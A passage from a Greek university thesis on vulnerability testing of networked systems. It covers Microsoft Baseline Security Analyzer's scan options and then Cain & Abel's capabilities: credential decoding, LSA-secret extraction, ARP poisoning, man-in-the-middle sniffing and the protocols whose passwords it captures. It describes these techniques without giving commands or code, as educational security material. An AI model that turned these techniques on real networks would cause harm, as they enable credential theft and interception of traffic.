SQL Server.

• Check for Internet Information Services (IIS) administrative vulnerabilities:

Πραγματοποιούνται έλεγχοι στον IIS 5.0, 5.1 και IIS 6.0, όπως για sample εφαρμογές και

Page 109: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

109 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

εικονικούς καταλόγους. Επιπρόσθετα, ελέγχεται αν τρέχει στον υπολογιστή το IIS

Lockdown tool, το οποίο μπορεί να βοηθήσει ένα διαχειριστή να διαμορφώσει και να

ασφαλίσει εξυπηρετητές στους οποίους εκτελείται ο IIS.

• Check for SQL administrative vulnerabilities: Γίνεται έλεγχος για τις ευπάθειες της

διαχείρισης σε κάθε στιγμιότυπο του SQL Server και της Microsoft Data Engine (MSDE)

που βρίσκονται στον υπολογιστή, όπως ο τύπος αυθεντικοποίησης και η κατάσταση του

συνθηματικού του λογαριασμού sa.

• Check for security updates: Η ανίχνευση των υπολογιστών για τις ενημερώσεις

ασφάλειας χρησιμοποιεί τεχνολογίες Microsoft Update and WSUS. Το WSUS είναι ένα

περιεκτικό και αυτόνομο εργαλείο το οποίο χρησιμοποιεί έναν κατάλογο που

ενημερώνεται από τη Microsoft κάθε φορά που δημοσιοποιούνται νέες ενημερώσεις

ασφάλειας. Αυτός ο κατάλογος χρησιμοποιείται για να ελέγξει την κατάσταση των

ενημερώσεων (updates) ασφάλειας (μόνο για προϊόντα της Microsoft) στους υπολογιστές

που ελέγχονται. Εάν οποιεσδήποτε ενημερώσεις ασφάλειας στον κατάλογο δεν είναι

εγκατεστημένες στον υπολογιστή, το MBSA τις παραθέτει στην αναφορά. Σημειώνεται

ότι για τα προϊόντα που δεν είναι εγκατεστημένα στον υπολογιστή που γίνεται ο έλεγχος,

ο έλεγχος ενημερώσεων ασφάλειας δεν εκτελείται και δεν παρατίθεται στον πίνακα

αποτελεσμάτων στην αναφορά. Εάν ο χρήστης επιλέξει να πραγματοποιηθεί αυτός ο

έλεγχος έχει κάποιες επιπλέον επιλογές στη διάθεσή του:

Configure computers for Microsoft Update and scanning prerequisites: Η επιλογή

αυτή είναι απενεργοποιημένη ως προεπιλογή στο MBSA. Εάν ενεργοποιηθεί από το

χρήστη επιτρέπει στο MBSA να πραγματοποιήσει αυτόματη εγκατάσταση ή

ενημέρωση του Windows Update Agent (WUA) για κάθε client-στόχο με την έκδοση

του WUA που χρειάζονται, ώστε η σάρωση για έλεγχο ενημερώσεων να είναι

επιτυχής. Επίσης, επειδή για τη σάρωση ορισμένων προϊόντων απαιτείται ο Windows

Installer η αναφορά σάρωσης θα επισημαίνει εάν θα πρέπει να ενημερωθεί ή εάν

υπάρχουν άλλα προαπαιτούμενα τα οποία απουσιάζουν και είναι απαραίτητα για τον

επιτυχή έλεγχο.

Advanced Update Services options: Οι προηγμένες επιλογές υπηρεσιών ενημέρωσης

παρέχουν στο χρήση τις εξής δυνατότητες:

Scan using assigned Update Services servers only: Η επιλογή αυτή

χρησιμοποιείται σε περιβάλλοντα που διαχειρίζονται από WSUS server. Με αυτή

την επιλογή, οι υπολογιστές που δεν έχουν εκχωρηθεί σε έναν WSUS server θα

εμφανίσουν ένα μήνυμα λάθους στην αναφορά ότι δεν μπορούν να ελεγχθούν.

Αυτή η επιλογή παρέχει στο διαχειριστή του WSUS server έναν τρόπο να

Page 110: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

110 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

εξασφαλίσει ότι στον έλεγχο περιλαμβάνονται μόνο οι υπολογιστές που

διαχειρίζονται μέσω του WSUS server και ως εκ τούτου, στην αναφορά

περιλαμβάνονται μόνο οι εγκεκριμένες ενημερωμένες εκδόσεις.

Scan using Microsoft Update only: Η επιλογή αυτή χρησιμοποιείται όταν είναι

επιθυμητό να αγνοηθεί ο κατάλογος των εγκεκριμένων ενημερωμένων εκδόσεων

σε υπολογιστές που έχουν εκχωρηθεί σε έναν WSUS server. Η επιλογή αυτή

συνεπάγεται ότι όλες οι ενημερώσεις ταξινομούνται με βάση την κρισιμότητά

τους. Για λόγους απόδοσης, προτείνεται αρχικά η χρήση της ιστοσελίδας του

Microsoft Update και αν δεν υπάρχει πρόσβαση, η σάρωση θα χρησιμοποιήσει

έναν offline κατάλογο, η χρήση του οποίου όμως μπορεί να απαιτήσει πρόσθετο

εύρο ς ζώνης δικτύου. Εάν ο υπο λο γιστής έχει ήδη ρυθμιστεί για χρήση της

ιστοσελίδας του Microsoft Update δεν απαιτούνται επιπλέον αλλαγές κατά τη

διάρκεια της σάρωσης. Εάν ο υπολογιστής διαχειρίζεται από έναν εξυπηρετητή

WSUS, η χρήση αυτής της επιλογής δεν αλλάζει και δεν παρεμβαίνει στις

ρυθμίσεις διαχείρισης του εξυπηρετητή WSUS ή τις Αυτόματες ενημερώσεις του

υπολογιστή.

Αφού ο χρήστης διαμορφώσει τις επιθυμητές επιλογές, ο έλεγχος ξεκινάει με το πάτημα του

πλήκτρου Start Scan. Εάν ο έλεγχος διενεργείται online, το MBSA λαμβάνει από τη

Microsoft τις πιο πρόσφατες ενημερώσεις ασφάλειας σε μορφή αρχείου καταλόγου .cab. Εάν

ο έλεγχος πραγματοποιείται offline χρησιμοποιείται το αρχείο .cab που βρίσκεται

αποθηκευμένο στον υπολογιστή.

Με την ολοκλήρωση του ελέγχου τα αποτελέσματα παρουσιάζονται σε μια ευανάγνωστη

αναφορά η οποία ενημερώνει για το τι ελέγχθηκε (What was scanned), λεπτομέρειες των

αποτελεσμάτων (Result details) και πως μπο ρο ύν να διο ρθωθούν τα σφάλματα πο υ

εντοπίστηκαν (How to correct this). Η ταξινόμηση των αποτελεσμάτων γίνεται ανά

κατηγορία ελέγχων, ενώ παρέχεται η δυνατότητα επιλογής εμφάνισης των καλύτερων ή των

χειρότερων αποτελεσμάτων πρώτα. Η χρήση εικονιδίων βοηθά στον εύκολο εντοπισμό των

κρισιμότερων ευπαθειών.

Page 111: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

111 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Εικόνα 4.4: Αναφορά Εργαλείου MBSA

Η αναφορά που παράγεται κάθε φορά αποθηκεύεται και μπορεί να ανακληθεί οποιαδήποτε

στιγμή χρειαστεί.

Εναλλακτικά το εργαλείο μπορεί να εκτελεστεί από τη γραμμή εντολών. Ο χρήστης

ακολουθεί τα εξής βήματα: Επιλέγει Run και πληκτρολογεί cmd. Μεταβαίνει στον κατάλογο

(directory) του εργαλείου, συνήθως C:\Program Files\Microsoft Baseline

Security Analyzer 2. Στην περίπτωση όπου ταυτόχρονα είναι ανοιχτή η παραθυρική

εφαρμογή, αυτός ο έλεγχος δεν θα πραγματοποιηθεί. Για τη σάρωση ενός ή περισσότερων

υπολογιστών η γενική σύνταξη της εντολής έχει τη μορφή: MBSACLI [/target {[domain\]computer | IP} | /r IP-IP | /d domain]

Page 112: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

112 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Εάν για παράδειγμα ο έλεγχος αφορά έναν υπολογιστή η εντολή είναι της μορφής MBSACLI

/target [domain or computer or IP]. Για τη χρήση περισσότερων παραμέτρων και

τη σύνταξή τους ο αναγνώστης παραπέμπεται στη βοήθεια που διαθέτει το MBSA.

Η αναφορά εμφανίζεται στην οθόνη εκτέλεσης, ενώ η μο ρφή της είναι συνεκτική και

κατανοητή, όπως και η τελική μορφή της αναφοράς από την παραθυρική εφαρμογή. Για

κάθε τομέα διαχωρίζονται τα: Issue (η ευπάθεια που ελέγχεται εκείνη τη στιγμή), score (το

αποτέλεσμα του ελέγχου στη κλίμακα του εργαλείου), result (ακριβή εξήγηση για το τι

συμβαίνει και υπάρχει το πρόβλημα), detail (περισσότερες λεπτομέρειες). Αν

χρησιμοποιηθεί αυτός ο τρόπος ελέγχου, είναι δύσκολη η διόρθωση των λαθών καθώς δεν

υπάρχει σύνδεσμος που να προτείνει λύσεις.

Page 113: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

113 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

4.4 Cain & Abel

4.4.1 Ταυτότητα

Το Cain & Abel είναι ένα δωρεάν εργαλείο ανάκτησης συνθηματικών για τα λειτουργικά

συστήματα της Microsoft και είναι διαθέσιμο μέσω της ιστοσελίδας

http://www.oxid.it/cain.html. Χρησιμοποιείται από διαχειριστές δικτύων και επαγγελματίες

ελέγχου ασφάλειας πληροφοριακών συστημάτων για την διενέργεια ελέγχων διείσδυσης.

Μπορεί όμως να χρησιμοποιηθεί και για κακόβουλους σκοπούς, για την ανακάλυψη

συνθηματικών και την πραγματοποίηση επιθέσεων τύπου Man In The Middle.

Το Cain & Abel είναι ένα αυτοματοποιημένο εργαλείο ανάκτησης συνθηματικών (Password

Cracking) το οποίο χρησιμοποιείται κατά κύριο λόγο για τον εντοπισμό προβλημάτων

ασφάλειας που σχετίζονται με τα συνθηματικά. Ανάκτηση συνθηματικών είναι η διαδικασία

hashing ενός αριθμού πιθανών συνθηματικών με χρήση του ίδιου hashing αλγορίθμου που

χρησιμοποιεί το λειτουργικό σύστημα και της σύγκρισης του αποτελέσματος με τα hashes

των συνθηματικών που είναι αποθηκευμένα στο λειτουργικό.

Το Cain & Abel μπορεί να χρησιμοποιηθεί για διαπιστωθεί κατά πόσο τηρείται η πολιτική

συνθηματικών του οργανισμού, καθώς και εάν είναι αποτελεσματική ή χρειάζεται

τροποποίηση. Επιπλέον, μπορεί να συμβάλλει στον εντοπισμό κακόβουλων δραστηριοτήτων

μέσα σε ένα δίκτυο μέσω της παρακολούθησης της κίνησης των πακέτων σε αυτό , με

αξιοποίηση της λειτουργίας Man In The Middle.

Συνοπτικά μπορούμε να πούμε ότι το Cain & Abel επιτρέπει:

• την εύκολη ανάκτηση διαφόρων τύπων συνθηματικών από το δίκτυο μέσω sniffing,

• την ανάκτηση (crack) κρυπτογραφημένων συνθηματικών με χρήση λεξικού,

εξαντλητικών αναζητήσεων και κρυπταναλυτικών επιθέσεων,

• την καταγραφή συνομιλιών VoIP,

• την αποκωδικοποίηση κρυπτογραφημένων συνθηματικών,

• την ανάκτηση κλειδιών ασύρματων δικτύων,

• την αποκάλυψη συνθηματικών σε password boxes widgets,

• την αποκάλυψη προσωρινά αποθηκευμένων συνθηματικών και

• την ανάλυση πρωτοκόλλων δρομολόγησης.

Το πρόγραμμα δεν εκμεταλλεύεται τα τρωτά σημεία κάθε λογισμικού ή σφάλματα που δεν

Page 114: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

114 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

μπορούν να διορθωθούν με μικρή προσπάθεια. Εκμεταλλεύεται ορισμένες πτυχές εγγενών

αδυναμιών ασφάλειας στις προδιαγραφές των πρωτοκόλλων, τις μεθόδους

αυθεντικοποίησης του χρήστη και των μηχανισμών προσωρινής αποθήκευσης. Κύριος

σκοπός του εργαλείου είναι η ανάκτηση συνθηματικών και πιστοποιητικών από διάφορες

πηγές.

Το Cain & Abel αναπτύχθηκε με σκοπό να χρησιμοποιηθεί από διαχειριστές δικτύων,

εκπαιδευτικούς, συμβούλους ασφάλειας/επαγγελματίες, δικανικό προσωπικό, προμηθευτές

λογισμικού ασφάλειας, επαγγελματίες που διενεργούν ελέγχους διείσδυσης και

οποιονδήποτε θέλει να το χρησιμοποιήσει για ηθικούς σκοπούς.

Η χρήση του εργαλείου εγκυμονεί τον κίνδυνο πρόκλησης ζημιών και / ή απώλεια των

δεδομένων.

4.4.2 Δυνατότητες Το Cain & Abel αποτελείται από δυο μέρη: το Cain το οποίο είναι ή κύρια εφαρμογή σε

γραφικό περιβάλλον και το Abel το οποίο είναι μια Windows υπηρεσία και αποτελείται από

δύο αρχεία το Abel.exe και το Abel.dll Στη συνέχεια παρουσιάζονται αναλυτικότερα οι

δυνατότητες του Cain & Abel.

Δυνατότητες του Cain

• Αποκάλυψη τοπικά αποθηκευμένων συνθηματικών

Το Cain μέσω του Protected Storage Password Manager απαριθμεί τις εγγραφές που

πραγματοποιούνται από διάφορες εφαρμογές των Windows όπως ο Internet Explorer, το

Outlook και το Outlook Express για την κρυπτογραφημένη αποθήκευση των ονομάτων

χρηστών και των συνθηματικών τους και αποκωδικοποιεί τους ακόλουθους τύπους

πιστοποιητικών:

MS Outlook 2002's passwords(POP3, SMTP, IMAP, HTTP)

Outlook Express's passwords(POP3, NNTP, SMTP, IMAP, HTTP, LDAP, HTTP-

Mail)

Outlook Express Identities

MS Outlook's passwords (POP3, NNTP, SMTP, IMAP, LDAP, HTTP-Mail)

MSN Explorer's Sign In passwords

MSN Explorer's Auto Complete passwords

Internet Explorer's protected sites passwords

Page 115: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

115 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Internet Explorer's Auto complete passwords

Το αποθηκευμένο περιεχόμενο που εντοπίζεται καθώς και τα μη

χρησιμοποιούμενα/ξεχασμένα προσωρινά συνθηματικά μπορούν εύκολα να ανακτηθούν

μέσα από το γραφικό περιβάλλον λειτουργίας του Cain.

• Αποκάλυψη συνθηματικών τα οποία βρίσκονται αποθηκευμένα στα Enterprise and

Local Credential Sets των Windows XP/2003 Credential Manager Password

Decoder

Το Credential Manager είναι μια λύση SSO (Single sign-on) την οποία προσφέρει η

Microsoft στα Windows Server 2003 και Windows XP με σκοπό την ασφαλή

αποθήκευση των πληροφοριών πιστοποίησης. Αυτή η λειτουργία επιτρέπει την εισαγωγή

ονομάτων χρηστών και συνθηματικών για διάφορες πηγές του δικτύου και των

εφαρμογών μια φορά, ενώ στη συνέχεια δεν απαιτείται η παρέμβαση του χρήστη αφού το

σύστημα αναλαμβάνει αυτόματα την υποστήριξη αυτών των πληροφοριών σε επόμενη

χρήση των πηγών. Το Cain έχει τη δυνατότητα να αποκρυπτογραφεί τα αρχεία των

πιστοποιητικών χρησιμοποιώντας την τεχνική “DLL injection” και να τα εμφανίζει στην

οθόνη. Το πρόγραμμα θα προσπαθήσει να αναγνωρίσει συνθηματικά απλού κειμένου τα

οποία είναι αποθηκευμένα ως MultiByte strings ή WideChar strings και θα

αποκωδικοποιήσει Passport και Standard credential BLOBS που κωδικοποιήθηκαν

αρχικά με χρήση του CryptProtectData API.

• Αποκάλυψη του περιεχομένου των Local Security Authority Secrets

Τα LSA Secrets χρησιμοποιούνται για την αποθήκευση πληροφοριών, όπως τα

συνθηματικά για την εκκίνηση υπηρεσιών λογαριασμού εκτός του τοπικού συστήματος,

συνθηματικά άλλων εφαρμογών καθώς και πιστοποιητικά Dial-Up συνδέσεων. Το Cain

έχει τη δυνατότητα να αποκρυπτογραφεί τα LSA Secrets χρησιμοποιώντας την τεχνική

“DLL injection”.

• Αποκάλυψη συνθηματικών Dialup

Τα πιστοποιητικά RAS (Remote Access Services) συνήθως αποθηκεύονται στα LSA

Secrets "L$_RasDefaultCredentials" και "RasDialParams!<UserSID>" ενώ όλες οι άλλες

παράμετροι σύνδεσης αποθηκεύονται στους φακέλους Phonebook files (.pbk). Το Cain

εργάζεται όπως και στην αποκάλυψη των LSA Secrets χρησιμοποιώντας την τεχνική

“DLL injection”.

Page 116: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

116 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Παραποίηση πινάκων ARP και εκτέλεση επιθέσεων Man-In-The Middle

Το APR (ARP Poison Routing) είναι το κύριο χαρακτηριστικό του προγράμματος.

Επιτρέπει sniffing σε δίκτυα τα οποία χρησιμοποιούν μεταγωγείς (switch) και hijacking

της κυκλοφορίας πακέτων IP μεταξύ των κόμβων του δικτύου. Το πρόγραμμα έχει τη

δυνατότητα να παραποιήσει τις MAC διευθύνσεις που αποθηκεύονται στους πίνακες

ARP (Address Resolution Protocol) των δικτύων που χρησιμοποιούν μεταγωγείς για την

υλοποίησή τους. Αυτή η δυνατότητα επιτρέπει την παρακολούθηση των πακέτων που

κυκλοφορούν στο δίκτυο και την εκδήλωση επιθέσεων Man-In-The Middle.

• Παρακολούθηση και τροποποίηση του πίνακα δρομολόγησης των Windows

Ο Route Table manager του Cain παρέχει την ίδια λειτουργικότητα με το εργαλείο των

Windows "route.exe". Μέσω αυτής της δυνατότητας απαριθμούνται όλες οι εγγραφές

που εμφανίζονται στον τοπικό πίνακα δρομολόγησης των Windows. Επιπλέον παρέχεται

η δυνατότητα προσθήκης, διαγραφής ή τροποποίησης δρομολογήσεων.

• Εξαγωγή ονομάτων χρηστών σε σχέση με το SID (Security Identifiers) σε ένα

απομακρυσμένο σύστημα

Το Cain's SID Scanner επιτρέπει την απαρίθμηση των χρηστών (μέσω null session) σε

συστήματα τα οποία έχουν θέσει την παράμετρο "RestrictAnonymous" σε 1 . Η

παράμετρος αυτή χρησιμοποιείται για τον περιορισμό των πληροφοριών που είναι

διαθέσιμες σε χρήστες που συνδέονται ανώνυμα.

• Απαρίθμηση ονομάτων χρηστών, ομάδων, διαμοιραζόμενων αρχείων και υπηρεσιών

που εκτελούνται σε ένα μηχάνημα

Ο Network Enumerator που διαθέτει το Cain χρησιμοποιεί τη συνάρτηση Windows

network management (Net*) για να ανακαλύψει τα πακέτα που διακινούνται στο δίκτυο.

Επιτρέπει την γρήγορη αναγνώριση Domain Controllers, SQL Servers, Printer Servers,

Remote Access Dial-In Servers, Novell Servers, Apple File Servers, Terminal Servers

κλπ. Μπορεί επίσης να εμφανίσει, όπου είναι δυνατό, την έκδοση του λειτουργικού

συστήματος. Όταν συνδεθεί σε ένα Server μπορεί να απαριθμήσει τα ονόματα των

χρηστών τις ο μάδες, της υπηρεσίες και τα διαμοιραζό μενα αρχεία σε αυτό ν. Από

προεπιλογή το πρόγραμμα συνδέεται στον απομακρυσμένο κρυφό κοινόχρηστο

κατάλογο IPC$ χρησιμοποιώντας τον τοπικό συνδεδεμένο χρήστη και αν αποτύχει

χρησιμοποιεί κενή σύνοδο (Anonymous sessions). Ωστόσο είναι πιθανό να προσδιορίσει

τα πιστοποιητικά που χρησιμοποιούνται για τη σύνδεση. Η Quick List μπορεί να

χρησιμοποιηθεί για την εισαγωγή ΙΡ διευθύνσεων των κόμβους οι οποίοι δεν φαίνονται

Page 117: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

117 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

κατά την εξερεύνηση του δικτύου. Κατά την απαρίθμηση των χρηστών το Cain μπορεί να

εξάγει το Security Identifier (SID) τους και έχει την ικανότητα να προσδιορίσει το όνομα

του λογαριασμού του Διαχειριστή ακόμα και αν αυτός έχει μετονομαστεί.

• Τροποποίηση των παραμέτρων του μητρώου Remote Registry

Το Cain επιτρέπει τον χειρισμό των παραμέτρων του μητρώου από το δίκτυο αρκεί στο

απομακρυσμένο μηχάνημα να εκτελείται η υπηρεσία "Remote Registry Service".

• Διαχείριση υπηρεσιών

Επιτρέπει την έναρξη, τον τερματισμό, την παύση/συνέχιση ή την αφαίρεση μιας

υπηρεσίας ΝΤ σε ένα Windows μηχάνημα.

• Δυνατότητα Sniffing

Συλλαμβάνει συνθηματικά, hashes και πληροφορίες αυθεντικοποίησης ενώσω

μεταδίδονται σε ένα δίκτυο. Περιλαμβάνει διάφορα φίλτρα για την εφαρμογή ειδικών

αυθεντικοποιήσεων και πρωτόκολλων δρομολόγησης:

VoIP Filter

Το φίλτρο VoIP επιτρέπει την καταγραφή φωνητικών συνομιλιών οι οποίες μεταδίδονται

μέσω του πρωτοκόλλου SIP/RTP και οι οποίες αποθηκεύονται ως αρχεία WAV.

Υπάρχει ένα φίλτρο BPF (Berkeley Packet Filter) στο driver του πρωτοκόλλου το οποίο

τον καθοδηγεί να επεξεργάζεται μόνο την ARP και IP κυκλοφορία.

Protocol Filters

Ο sniffer περιλαμβάνει διάφορα φίλτρα συνθηματικών τα οποία χρησιμοποιούνται για να

συλλαμβάνουν συνθηματικά από τα ακόλουθα πρωτόκολλα:

Password Filter

Πρωτόκολλο Τύποι Αυθεντικοποίησης FTP Plaintext HTTP / HTTP Proxy

Basic, Form, Cookie, LM, NTLMv1, NTLMv2, NTLM Session Security, NTLMSSP

IMAP Plaintext, LOGIN, CRAM-MD5, LM, NTLMv1, NTLMv2, NTLM Session Security, NTLMSSP

POP3 Plaintext, APOP-MD5, CRAM-MD5, LM, NTLMv1, NTLMv2, NTLM Session Security, NTLMSSP

SMTP Plaintext, LOGIN, CRAM-MD5, LM, NTLMv1, NTLMv2, NTLM Session Security, NTLMSSP

LDAP Plaintext NNTP Plaintext, LM, NTLMv1, NTLMv2, NTLM Session Security, NTLMSSP ICQ v.7 VNC 3DES TDS (Sybase / MSSQL)

v4.x, v5.0, v7.0 XOR, v7.0 NTLMv1, NTLMv2, NTLM Session Security, NTLMSSP

MySQL v3.23, SHA-1 DCE/RPC LM, NTLMv1, NTLMv2, NTLM Session Security, NTLMSSP

Page 118: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

118 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

SMB Plaintext, LM, NTLMv1, NTLMv2, NTLM Session Security, NTLMSSP MS Kerberos5 PreAuth encrypted timestamps Radius PreShared Keys, User's passwords IKE Aggressive Mode PreShared Keys (MD5 and SHA-1) SNMP Community strings RIP Plaintext, hash, RIPv2-MD5 HSRP Plaintext EIGRP MD5 OSPF Simple, MD5 VRRP Simple, IP-AH, HMAC_MD5_96 SIP Authorization and Proxy-Authorization (MD5) GRE/PPP PAP, CHAP-MD5, MS-CHAPv1, MS-CHAPv2 PPPoE PAP, CHAP-MD5, MS-CHAPv1, MS-CHAPv2 Oracle TNS DES, 3DES, AES-128, AES-192 Telnet Entire session is dumped to file starting from a packet containing data to a

FIN packet *HTTPS Entire session is dumped to file + the same types as HTTP *LDAPS Entire session is dumped to file + the same types as LDAP *IMAPS Entire session is dumped to file + the same types as IMAP *POP3S Entire session is dumped to file + the same types as POP3 *FTPS Entire session is dumped to file + the same types as FTP *SSH-1 Entire session dumped to file (FULL-DUPLEX, stealth, supports DES,

3DES, Blowfish symmetric encryption algorithms, auto-downgrade to SSH-1 if server version is v1.99)

MGCP/RTP Captures and decode VoIP conversations that travels on RTP protocol and saves them as WAV files.

SIP/RTP Captures and decode VoIP conversations that travels on RTP protocol and saves them as WAV files.

(*) = απαιτείται APR (Arp Poison Routing) για να ενεργοποιηθεί

Πίνακας 4-2: Πρωτόκολλα από τα οποία μπορεί να γίνει σύλληψη πιστοποιητικών με το Cain & Abel

Ο sniffer μπορεί επίσης να επεξεργαστεί αρχεία τα οποία έχουν συλλέγει από άλλα

προγράμματα (Ethereal, Tcpdump and Winpcap) σε λειτουργία off-line.

Off-line επεξεργασία αρχείων

Πρωτόκολλα δρομολόγησης όπως τα VRRP, HSRP, RIP, OSPF, EIGRP μπορούν επίσης

να αναλυθούν από το πρόγραμμα. Για τα πρωτόκολλα EIGRP και RIP, το

χαρακτηριστικό "Routes Extractor" θα αποκαλύψει επίσης τον τρέχοντα πίνακα

δρομολόγησης ο οποίος είναι κοινός μεταξύ των δρομολογητών. Αυτό το

χαρακτηριστικό υποστηρίζεται μόνο όταν αυτά τα πρωτόκολλα δεν απαιτούν

αυθεντικοποίηση.

Routing Protocols Analysis

• Παρακολούθηση πρωτοκόλλων δρομολόγησης

Παρακολουθεί τα μηνύματα από διάφορα πρωτόκολλα δρομολόγησης (HSRP, VRRP,

RIPv1, RIPv2, EIGRP, OSPF) με σκοπό τη συλλογή αυθεντικοποιήσεων και πινάκων

δρομολόγησης.

Page 119: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

119 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Πλήρες sniffing μιας RDP συνόδου (APR-RDP)

Επιτρέπει τη σύλληψη όλων των δεδομένων που αποστέλλονται σε μια σύνοδο Remote

Desktop Protocol (RDP) στο δίκτυο. Παρέχει επίσης τη δυνατότητα ανάκτησης

συνθηματικών τα οποία πληκτρολογούνται σε έναν κόμβο του δικτύου. Η λειτουργία

APR-RDP που διαθέτει το Cain επιτρέπει τη σύλληψη και την αποκρυπτογράφηση της

κυκλοφορίας Remote Desktop Protocol μεταξύ των μηχανημάτων που χρησιμοποιούν το

πρωτόκολλο RDP. Το πρωτόκολλο RDP χρησιμοποιείται για τη σύνδεση με τις

υπηρεσίες Windows Terminal του απομακρυσμένου υπολογιστή.

